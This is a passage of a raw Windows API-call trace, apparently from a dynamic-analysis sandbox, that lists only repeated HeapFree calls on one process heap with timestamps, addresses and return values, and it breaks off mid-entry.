[0121.277] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78280 | out: hHeap=0x2a0000) returned 1 [0121.278] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78258 | out: hHeap=0x2a0000) returned 1 [0121.278] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b781e0 | out: hHeap=0x2a0000) returned 1 [0121.278] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78168 | out: hHeap=0x2a0000) returned 1 [0121.279] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78140 | out: hHeap=0x2a0000) returned 1 [0121.279] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b786e0 | out: hHeap=0x2a0000) returned 1 [0121.279] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4da28 | out: hHeap=0x2a0000) returned 1 [0121.280] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4dad0 | out: hHeap=0x2a0000) returned 1 [0121.280] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78730 | out: hHeap=0x2a0000) returned 1 [0121.281] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78a00 | out: hHeap=0x2a0000) returned 1 [0121.281] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78820 | out: hHeap=0x2a0000) returned 1 [0121.281] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b789d8 | out: hHeap=0x2a0000) returned 1 [0121.282] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78a28 | out: hHeap=0x2a0000) returned 1 [0121.282] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78a50 | out: hHeap=0x2a0000) returned 1 [0121.282] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78a78 | out: hHeap=0x2a0000) returned 1 [0121.283] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78aa0 | out: hHeap=0x2a0000) returned 1 [0121.283] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4db08 | out: hHeap=0x2a0000) returned 1 [0121.284] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4db40 | out: hHeap=0x2a0000) returned 1 [0121.284] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78ac8 | out: hHeap=0x2a0000) returned 1 [0121.284] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78af0 | out: hHeap=0x2a0000) returned 1 [0121.285] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78b18 | out: hHeap=0x2a0000) returned 1 [0121.285] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78b40 | out: hHeap=0x2a0000) returned 1 [0121.286] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78b68 | out: hHeap=0x2a0000) returned 1 [0121.286] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78b90 | out: hHeap=0x2a0000) returned 1 [0121.286] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78bb8 | out: hHeap=0x2a0000) returned 1 [0121.287] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78be0 | out: hHeap=0x2a0000) returned 1 [0121.288] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4dc20 | out: hHeap=0x2a0000) returned 1 [0121.288] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4dc90 | out: hHeap=0x2a0000) returned 1 [0121.288] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78c08 | out: hHeap=0x2a0000) returned 1 [0121.289] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78c30 | out: hHeap=0x2a0000) returned 1 [0121.289] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78c58 | out: hHeap=0x2a0000) returned 1 [0121.290] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78c80 | out: hHeap=0x2a0000) returned 1 [0121.290] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78ca8 | out: hHeap=0x2a0000) returned 1 [0121.291] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbc110 | out: hHeap=0x2a0000) returned 1 [0121.291] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b853a0 | out: hHeap=0x2a0000) returned 1 [0121.291] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b70df8 | out: hHeap=0x2a0000) returned 1 [0121.291] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b01af0 | out: hHeap=0x2a0000) returned 1 [0121.292] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2dc3a8 | out: hHeap=0x2a0000) returned 1 [0121.293] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4d6e0 | out: hHeap=0x2a0000) returned 1 [0121.295] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba33c8 | out: hHeap=0x2a0000) returned 1 [0121.295] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba3380 | out: hHeap=0x2a0000) returned 1 [0121.295] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba3338 | out: hHeap=0x2a0000) returned 1 [0121.296] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba3218 | out: hHeap=0x2a0000) returned 1 [0121.296] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ac2b80 | out: hHeap=0x2a0000) returned 1 [0121.297] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2dba50 | out: hHeap=0x2a0000) returned 1 [0121.297] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b027b8 | out: hHeap=0x2a0000) returned 1 [0121.297] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b3268 | out: hHeap=0x2a0000) returned 1 [0121.297] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2edc0 | out: hHeap=0x2a0000) returned 1 [0121.297] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b483e8 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b48c70 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b494f8 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd0c60 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b28688 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b47b60 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8b460 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8ac48 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8a430 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b89c18 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b89400 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b88be8 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b883d0 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x3631b0 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8bc88 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8c4b0 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8cce8 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8d520 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8dd58 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8e590 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbc9e8 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbd210 | out: hHeap=0x2a0000) returned 1 [0121.298] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbda38 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbe280 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbead8 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbf330 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbfb58 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc0380 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc0bc8 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc1410 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc1c48 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc2480 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc2cb8 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc34e0 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc3d08 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc4530 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc4d68 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc55a0 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2f210 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc5dc8 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc6620 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2fa98 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b30320 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc6e78 | out: hHeap=0x2a0000) returned 1 [0121.299] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc76b0 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc7ef8 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b82048 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc8740 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc8f78 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b30ba8 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b31430 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b31cb8 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc9fe8 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bca820 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b32540 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcb8a8 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcc100 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b32dc8 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b33650 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcb058 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcd198 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bce228 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bc97b0 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcc958 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b34760 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b33ed8 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b34fe8 | out: hHeap=0x2a0000) returned 1 [0121.300] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b35870 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b360f8 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b42e98 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b42610 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcfb98 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd03f0 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b43720 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b43fa8 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b450b8 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcf348 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b45940 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b461c8 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b46a50 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b44830 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b472d8 | out: hHeap=0x2a0000) returned 1 [0121.301] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcea70 | out: hHeap=0x2a0000) returned 1 [0121.302] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbb8f8 | out: hHeap=0x2a0000) returned 1 [0121.302] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b286f0 | out: hHeap=0x2a0000) returned 1 [0121.302] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b84328 | out: hHeap=0x2a0000) returned 1 [0121.303] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b77388 | out: hHeap=0x2a0000) returned 1 [0121.303] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2afdfb8 | out: hHeap=0x2a0000) returned 1 [0121.303] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2afd6c0 | out: hHeap=0x2a0000) returned 1 [0121.304] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba14e8 | out: hHeap=0x2a0000) returned 1 [0121.304] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf5d80 | out: hHeap=0x2a0000) returned 1 [0121.304] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf6608 | out: hHeap=0x2a0000) returned 1 [0121.304] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bfd9a8 | out: hHeap=0x2a0000) returned 1 [0121.305] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bfe230 | out: hHeap=0x2a0000) returned 1 [0121.305] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b28dd8 | out: hHeap=0x2a0000) returned 1 [0121.305] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf4c70 | out: hHeap=0x2a0000) returned 1 [0121.305] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bfa900 | out: hHeap=0x2a0000) returned 1 [0121.306] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bfb118 | out: hHeap=0x2a0000) returned 1 [0121.306] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bfb930 | out: hHeap=0x2a0000) returned 1 [0121.306] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bfc148 | out: hHeap=0x2a0000) returned 1 [0121.306] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bfc960 | out: hHeap=0x2a0000) returned 1 [0121.307] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bfd178 | out: hHeap=0x2a0000) returned 1 [0121.307] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf54f8 | out: hHeap=0x2a0000) returned 1 [0121.307] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b1aba8 | out: hHeap=0x2a0000) returned 1 [0121.308] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd1d70 | out: hHeap=0x2a0000) returned 1 [0121.308] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd25f8 | out: hHeap=0x2a0000) returned 1 [0121.308] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd2e80 | out: hHeap=0x2a0000) returned 1 [0121.309] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd3708 | out: hHeap=0x2a0000) returned 1 [0121.309] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd3f90 | out: hHeap=0x2a0000) returned 1 [0121.309] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bb6928 | out: hHeap=0x2a0000) returned 1 [0121.309] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd4818 | out: hHeap=0x2a0000) returned 1 [0121.310] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd50a0 | out: hHeap=0x2a0000) returned 1 [0121.310] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be2c48 | out: hHeap=0x2a0000) returned 1 [0121.310] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be3490 | out: hHeap=0x2a0000) returned 1 [0121.310] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be3ce8 | out: hHeap=0x2a0000) returned 1 [0121.311] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd5928 | out: hHeap=0x2a0000) returned 1 [0121.311] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd61b0 | out: hHeap=0x2a0000) returned 1 [0121.311] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be4540 | out: hHeap=0x2a0000) returned 1 [0121.312] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be4d88 | out: hHeap=0x2a0000) returned 1 [0121.312] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd6a38 | out: hHeap=0x2a0000) returned 1 [0121.312] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd72c0 | out: hHeap=0x2a0000) returned 1 [0121.312] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd7b48 | out: hHeap=0x2a0000) returned 1 [0121.312] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd83d0 | out: hHeap=0x2a0000) returned 1 [0121.313] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd8c58 | out: hHeap=0x2a0000) returned 1 [0121.313] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd94e0 | out: hHeap=0x2a0000) returned 1 [0121.313] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd9d68 | out: hHeap=0x2a0000) returned 1 [0121.313] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bda5f0 | out: hHeap=0x2a0000) returned 1 [0121.314] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bdae78 | out: hHeap=0x2a0000) returned 1 [0121.314] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bdb700 | out: hHeap=0x2a0000) returned 1 [0121.314] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be55d0 | out: hHeap=0x2a0000) returned 1 [0121.314] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be5e28 | out: hHeap=0x2a0000) returned 1 [0121.315] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bdbf88 | out: hHeap=0x2a0000) returned 1 [0121.315] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bdc810 | out: hHeap=0x2a0000) returned 1 [0121.315] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bdd098 | out: hHeap=0x2a0000) returned 1 [0121.315] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be6680 | out: hHeap=0x2a0000) returned 1 [0121.316] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be6ec8 | out: hHeap=0x2a0000) returned 1 [0121.316] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bdd920 | out: hHeap=0x2a0000) returned 1 [0121.316] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bde1a8 | out: hHeap=0x2a0000) returned 1 [0121.316] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bdea30 | out: hHeap=0x2a0000) returned 1 [0121.317] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bdf2b8 | out: hHeap=0x2a0000) returned 1 [0121.317] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bdfb40 | out: hHeap=0x2a0000) returned 1 [0121.317] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be7728 | out: hHeap=0x2a0000) returned 1 [0121.317] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be7fb0 | out: hHeap=0x2a0000) returned 1 [0121.318] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be8838 | out: hHeap=0x2a0000) returned 1 [0121.318] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be90c0 | out: hHeap=0x2a0000) returned 1 [0121.318] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf7710 | out: hHeap=0x2a0000) returned 1 [0121.318] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf7f68 | out: hHeap=0x2a0000) returned 1 [0121.319] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2be9948 | out: hHeap=0x2a0000) returned 1 [0121.319] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bea1d0 | out: hHeap=0x2a0000) returned 1 [0121.319] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2beaa58 | out: hHeap=0x2a0000) returned 1 [0121.319] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf87c0 | out: hHeap=0x2a0000) returned 1 [0121.320] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf9008 | out: hHeap=0x2a0000) returned 1 [0121.320] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2beb2e0 | out: hHeap=0x2a0000) returned 1 [0121.320] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bebb68 | out: hHeap=0x2a0000) returned 1 [0121.320] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bec3f0 | out: hHeap=0x2a0000) returned 1 [0121.321] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2becc78 | out: hHeap=0x2a0000) returned 1 [0121.321] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bed500 | out: hHeap=0x2a0000) returned 1 [0121.321] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bedd88 | out: hHeap=0x2a0000) returned 1 [0121.321] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bee610 | out: hHeap=0x2a0000) returned 1 [0121.322] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2beee98 | out: hHeap=0x2a0000) returned 1 [0121.322] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bef720 | out: hHeap=0x2a0000) returned 1 [0121.322] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf9850 | out: hHeap=0x2a0000) returned 1 [0121.323] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bfa0a8 | out: hHeap=0x2a0000) returned 1 [0121.323] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2beffa8 | out: hHeap=0x2a0000) returned 1 [0121.323] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf0830 | out: hHeap=0x2a0000) returned 1 [0121.323] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf10b8 | out: hHeap=0x2a0000) returned 1 [0121.324] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf1940 | out: hHeap=0x2a0000) returned 1 [0121.324] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf21c8 | out: hHeap=0x2a0000) returned 1 [0121.324] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, 